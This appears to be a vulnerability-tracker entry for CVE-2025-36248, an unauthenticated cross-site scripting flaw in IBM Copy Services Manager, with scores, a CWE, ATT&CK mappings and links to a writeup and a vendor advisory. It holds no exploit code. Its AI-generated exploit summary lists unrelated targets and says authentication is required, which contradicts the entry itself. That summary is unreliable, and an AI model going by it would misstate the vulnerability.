CVE-2025-36248

MEDIUM

IBM Copy Services Manager < 6.3.14 - Unauthenticated Cross-Site Scripting

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2025-36248. PoCs published by MarioTesoro.

AI-analyzed exploit summary This repository contains detailed technical writeups for multiple CVEs, including SQL injection, XSS, and CSRF vulnerabilities. Each README provides steps to reproduce, affected versions, impact analysis, and mitigation strategies, demonstrating a deep understanding of the vulnerabilities.

Description

IBM Copy Services Manager 6.3.13 is vulnerable to cross-site scripting. This vulnerability allows an unauthenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.

Exploits (1)

github WRITEUP

by MarioTesoro · poc

https://github.com/MarioTesoro/vulnerability-research/tree/main/CVE-2025-36248

View Code ZIP pw:eip

This repository contains detailed technical writeups for multiple CVEs, including SQL injection, XSS, and CSRF vulnerabilities. Each README provides steps to reproduce, affected versions, impact analysis, and mitigation strategies, demonstrating a deep understanding of the vulnerabilities.

Classification

Writeup 95%

Attack Type

Sqli | Xss | Csrf

Complexity

Moderate

Reliability

Reliable

Target: Veritas Data Insight, ACI Worldwide Proactive Risk Manager, Kanboard, Engineering Ingegneria Informatica SpagoBI

Auth required

Prerequisites: Admin access for some exploits · Authenticated user session for XSS/CSRF

MITRE ATT&CK

T1190 - Exploit Public-Facing Application T1059 - Command and Scripting Interpreter T1059.007 - JavaScript T1189 - Drive-by Compromise

devstral-2 · analyzed Feb 27, 2026 Full analysis →

References (1)

Core 1

Core References

Vendor Advisory vendor-advisory patch

https://www.ibm.com/support/pages/node/7245562

Scores

CVSS v3 6.1

EPSS 0.0020

EPSS Percentile 9.6%

Attack Vector NETWORK

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CISA SSVC

Vulnrichment

Exploitation none

Automatable no

Technical Impact partial

Details

CWE

CWE-79

Status published

Products (1)

ibm/copy_services_manager < 6.3.14

Published Sep 19, 2025

Tracked Since Feb 18, 2026